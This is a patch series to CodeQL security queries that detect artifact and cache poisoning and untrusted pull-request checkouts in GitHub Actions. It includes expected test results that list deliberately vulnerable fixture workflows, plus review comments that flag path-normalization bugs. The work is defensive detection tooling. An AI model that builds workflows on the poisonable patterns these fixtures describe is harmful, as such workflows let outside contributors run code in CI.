@@ -14,7 +17,10 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -45,6 +51,9 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -62,3 +71,5 @@ subpaths | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 431386fae06..079a89a498c 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,4 +1,7 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | 
@@ -14,7 +17,10 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -45,5 +51,8 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 006f365ae05..9358d65e8f4 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -1,6 +1,12 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | 
@@ -35,6 +41,18 @@ edges | .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning82.yml:16:9:22:2 | Uses Step | | .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | +| 
.github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | From 9d26a8da26db1ed4c21939f4c4442ab319108a42 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 18:22:35 +0200 Subject: [PATCH 0545/1267] Improve path checks for Artifact and Cache poisoning queries --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/Helper.qll | 27 +++++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 12 ++++ .../security/ArtifactPoisoningQuery.qll | 70 ++++++++++--------- .../actions/security/CachePoisoningQuery.qll | 10 ++- .../actions/security/PoisonableSteps.qll | 10 +-- .../security/UntrustedCheckoutQuery.qll | 18 ++--- .../CWE-349/CachePoisoningViaDirectCache.ql | 25 +------ .../.github/workflows/direct_cache6.yml | 15 +--- .../.github/workflows/neg_direct_cache4.yml | 23 ++++++ .../.github/workflows/neg_direct_cache5.yml | 23 ++++++ .../CachePoisoningViaDirectCache.expected | 14 ++-- .../CachePoisoningViaPoisonableStep.expected | 12 ++-- 13 files changed, 163 insertions(+), 98 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a1651eedc47..17b0dab4ee6 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -289,6 +289,8 @@ class Run extends Step instanceof RunImpl { ScalarValue getScriptScalar() { result = super.getScriptScalar() } Expression getAnScriptExpr() { result = super.getAnScriptExpr() } + + string getWorkingDirectory() { result = super.getWorkingDirectory() } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 9356950f571..f9fa108ec3a 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -283,3 +283,30 @@ string getRepoRoot() { result = "" ) } + +bindingset[path] +string normalizePath(string path) { + exists(string trimmed_path | trimmed_path = trimQuotes(path) | + // ./foo -> GITHUB_WORKSPACE/foo + if path.indexOf("./") = 0 + then result = path.replaceAll("./", "GITHUB_WORKSPACE/") + else + // GITHUB_WORKSPACE/foo -> GITHUB_WORKSPACE/foo + if path.indexOf("GITHUB_WORKSPACE/") = 0 + then result = path + else + // foo -> GITHUB_WORKSPACE/foo + if path.regexpMatch("^[^/~].*") + then result = "GITHUB_WORKSPACE/" + path.regexpReplaceAll("/$", "") + else + // ~/foo -> ~/foo + // /foo -> /foo + result = path + ) +} + +/** + * Holds if the path cache_path is a subpath of the path untrusted_path. + */ +bindingset[subpath, path] +predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 154d466ab7d..5361943331b 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
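Review bot: In the Helper.qll hunk, `normalizePath` binds `trimmed_path = trimQuotes(path)` but every branch then tests and returns `path`, so a quoted value is never unquoted before it is compared. The first branch uses `path.replaceAll("./", "GITHUB_WORKSPACE/")`, which rewrites every `./` in the string (including the tail of a `../` segment) rather than only the leading one; `RunImpl.getWorkingDirectory` in this same commit anchors the replacement with `^\\./`. Only the bare-relative branch strips a trailing `/`, so one directory can normalize to two spellings and fail the prefix test in `isSubpath`, which would be a missed result rather than a noisy one. The QLDoc on `isSubpath` still names `cache_path` and `untrusted_path` although the parameters are `subpath` and `path`. The version below uses the trimmed value throughout and anchors the replacement; trailing-slash handling is left as is because other predicates in this commit compare against the literal `GITHUB_WORKSPACE/`.

```ql
bindingset[path]
string normalizePath(string path) {
  exists(string trimmed_path | trimmed_path = trimQuotes(path) |
    // ./foo -> GITHUB_WORKSPACE/foo (leading "./" only)
    if trimmed_path.indexOf("./") = 0
    then result = trimmed_path.regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/")
    else
      // GITHUB_WORKSPACE/foo -> GITHUB_WORKSPACE/foo
      if trimmed_path.indexOf("GITHUB_WORKSPACE/") = 0
      then result = trimmed_path
      else
        // foo -> GITHUB_WORKSPACE/foo
        if trimmed_path.regexpMatch("^[^/~].*")
        then result = "GITHUB_WORKSPACE/" + trimmed_path.regexpReplaceAll("/$", "")
        else
          // ~/foo and /foo are kept as written
          result = trimmed_path
  )
}
```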
@@ -1317,6 +1317,18 @@ class RunImpl extends StepImpl { override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" } + + /** Gets the working directory for this `runs` mapping. */ + string getWorkingDirectory() { + if exists(n.lookup("working-directory").(YamlString).getValue()) + then + result = + n.lookup("working-directory") + .(YamlString) + .getValue() + .regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/") + else result = "GITHUB_WORKSPACE/" + } } /** diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 236cc4d8091..ebe22140be2 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -35,7 +35,9 @@ class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, Us } override string getPath() { - if exists(this.getArgument("path")) then result = this.getArgument("path") else result = "" + if exists(this.getArgument("path")) + then result = normalizePath(this.getArgument("path")) + else result = "GITHUB_WORKSPACE/" } } @@ -79,11 +81,11 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep override string getPath() { if exists(this.getArgument(["path", "download_path"])) - then result = this.getArgument(["path", "download_path"]) + then result = normalizePath(this.getArgument(["path", "download_path"])) else if exists(this.getArgument("paths")) - then result = this.getArgument("paths").splitAt(" ") - else result = "" + then result = normalizePath(this.getArgument("paths").splitAt(" ")) + else result = "GITHUB_WORKSPACE/" } } 
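Review bot: `getWorkingDirectory` rewrites only a leading `./`, so `working-directory: scripts` is returned as `scripts`, whereas `normalizePath` in Helper.qll would give `GITHUB_WORKSPACE/scripts`. The git and gh checkout classes in this commit now return this value from `getPath()`, where it is compared by prefix against normalized cache paths and will not match. If Helper.qll can be imported here, `result = normalizePath(n.lookup("working-directory").(YamlString).getValue())` keeps the two in step. The predicate also reads only the step's own key, so a `defaults.run.working-directory` set on the job or workflow appears to be ignored and the step is treated as running in the workspace root. The QLDoc says "for this `runs` mapping" although the member is on a run step; `/** Gets the working directory of this run step, or "GITHUB_WORKSPACE/" if none is set. */` would be more accurate. The enclosing `RunImpl` class starts outside the hunk.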
@@ -114,8 +116,8 @@ class LegitLabsDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, override string getPath() { if exists(this.getArgument("path")) - then result = this.getArgument("path") - else result = "./artifacts" + then result = normalizePath(this.getArgument("path")) + else result = "GITHUB_WORKSPACE/artifacts" } } @@ -161,14 +163,14 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - trimQuotes(this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) - then result = "" + then result = "GITHUB_WORKSPACE/" else none() } } @@ -197,18 +199,20 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + normalizePath(trimQuotes(script + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = - trimQuotes(this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or script.splitAt("\n").regexpMatch(unzipRegexp()) - then result = "" + then result = "GITHUB_WORKSPACE/" else none() } } 
@@ -244,14 +248,16 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + normalizePath(trimQuotes(script + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = - trimQuotes(this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) - else result = "" + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + else result = "GITHUB_WORKSPACE/" } } @@ -268,18 +274,16 @@ class ArtifactPoisoningSink extends DataFlow::Node { ( // Check if the poisonable step is a local script execution step // and the path of the command or script matches the path of the downloaded artifact + isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), download.getPath()) + or // Checking the path for non local script execution steps is very difficult not poisonable instanceof LocalScriptExecutionRunStep - or - // TODO: account for Run's working directory - poisonable - .(LocalScriptExecutionRunStep) - .getCommand() - .matches(["./", ""] + download.getPath() + "%") + // Its not easy to extract the path from a non-local script execution step so skipping this check for now + // and isSubpath(poisonable.(Run).getWorkingDirectory(), download.getPath()) ) or poisonable.(UsesStep) = this.asExpr() and - download.getPath() = "" + download.getPath() = "GITHUB_WORKSPACE/" ) } diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 56002cb2b16..a0113beed46 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
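Review bot: In the `ArtifactPoisoningSink` hunk (`@@ -268,18 +274,16 @@`) the removed `// TODO: account for Run's working directory` is still open: `LocalScriptExecutionRunStep.getPath()` resolves a relative script path against `GITHUB_WORKSPACE/`, not against the step's `working-directory`. A script started by relative name from inside the download directory therefore does not satisfy `isSubpath(...)` and the result is dropped. Resolving relative paths against `poisonable.(Run).getWorkingDirectory()` before the comparison would close that gap. The last disjunct tests `download.getPath() = "GITHUB_WORKSPACE/"` exactly, and as far as the visible `normalizePath` shows, an explicit `path: .` becomes `GITHUB_WORKSPACE/.`, so a download to the workspace root written that way does not reach the `UsesStep` case. The commented-out `// and isSubpath(...)` line would read better as a TODO stating what is missing; the enclosing class starts outside the hunk.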
@@ -51,13 +51,17 @@ abstract class CacheWritingStep extends Step { class CacheActionUsesStep extends CacheWritingStep, UsesStep { CacheActionUsesStep() { this.getCallee() = "actions/cache" } - override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } + override string getPath() { + result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n")) + } } class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } - override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } + override string getPath() { + result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n")) + } } class SetupRubyUsesStep extends CacheWritingStep, UsesStep { @@ -66,5 +70,5 @@ class SetupRubyUsesStep extends CacheWritingStep, UsesStep { this.getArgument("bundler-cache") = "true" } - override string getPath() { result = "vendor/bundle" } + override string getPath() { result = normalizePath("vendor/bundle") } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 5dd0081f61e..67bbfa2a4fe 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
@@ -36,18 +36,18 @@ class JavascriptImportnUsesStep extends PoisonableStep, UsesStep { } class LocalScriptExecutionRunStep extends PoisonableStep, Run { - string cmd; + string path; LocalScriptExecutionRunStep() { - exists(string line, string regexp, int command_group | + exists(string line, string regexp, int path_group | line = this.getScript().splitAt("\n").trim() | - poisonableLocalScriptsDataModel(regexp, command_group) and - cmd = line.regexpCapture(regexp, command_group) + poisonableLocalScriptsDataModel(regexp, path_group) and + path = line.regexpCapture(regexp, path_group) ) } - string getCommand() { result = cmd } + string getPath() { result = normalizePath(path.splitAt(" ")) } } class LocalActionUsesStep extends PoisonableStep, UsesStep { diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index df3e1e4d8a2..100a9c5dd5d 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -151,12 +151,6 @@ predicate containsHeadRef(string s) { ) } -private string getStepCWD() { - // TODO: This should be the path of the git command. - // Read if from the step's CWD, workspace or look for a cd command. - result = "?" -} - /** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { abstract string getPath(); @@ -208,7 +202,7 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt override string getPath() { if exists(this.(UsesStep).getArgument("path")) then result = this.(UsesStep).getArgument("path") - else result = "?" + else result = "GITHUB_WORKSPACE/" } } @@ -252,7 +246,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { override string getPath() { if exists(this.(UsesStep).getArgument("path")) then result = this.(UsesStep).getArgument("path") - else result = "?" + else result = "GITHUB_WORKSPACE/" } } 
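Review bot: `getPath()` returns `normalizePath(path.splitAt(" "))`, that is, one result per space-separated token of the captured group. If a regexp in `poisonableLocalScriptsDataModel` captures more than the script path, option and argument tokens become `GITHUB_WORKSPACE/...` candidates as well, and a path that contains a space is split apart. The getter has no QLDoc; something like `/** Gets a normalized path of a script or file executed by this step (one result per token of the captured group). */` would state the contract, and restricting the result to the token that names the script would make the prefix match in `ArtifactPoisoningSink` more precise.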
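Review bot: In `ActionsMutableRefCheckout.getPath()` (hunk `@@ -208,7 +202,7 @@`) the fallback is now `GITHUB_WORKSPACE/`, but an explicit `path` argument is still returned raw, so `path: pr` yields `pr` while the cache and artifact paths in this commit go through `normalizePath` and start with `GITHUB_WORKSPACE/`. The removed `controlledCachePath` normalized both sides; with `isSubpath`, a checkout into a subdirectory no longer prefixes any cache path and the cache-poisoning result is lost. Assuming `normalizePath` is in scope here through `import actions`, `then result = normalizePath(this.(UsesStep).getArgument("path"))` fixes it. The same line in `ActionsSHACheckout.getPath()` (hunk `@@ -252,7 +246,7 @@`) needs the same change.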
@@ -277,7 +271,7 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } /** Checkout of a Pull Request HEAD ref using git within a Run step */ @@ -298,7 +292,7 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -321,7 +315,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -341,5 +335,5 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index bda8224925e..91bb4d3bc5a 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql 
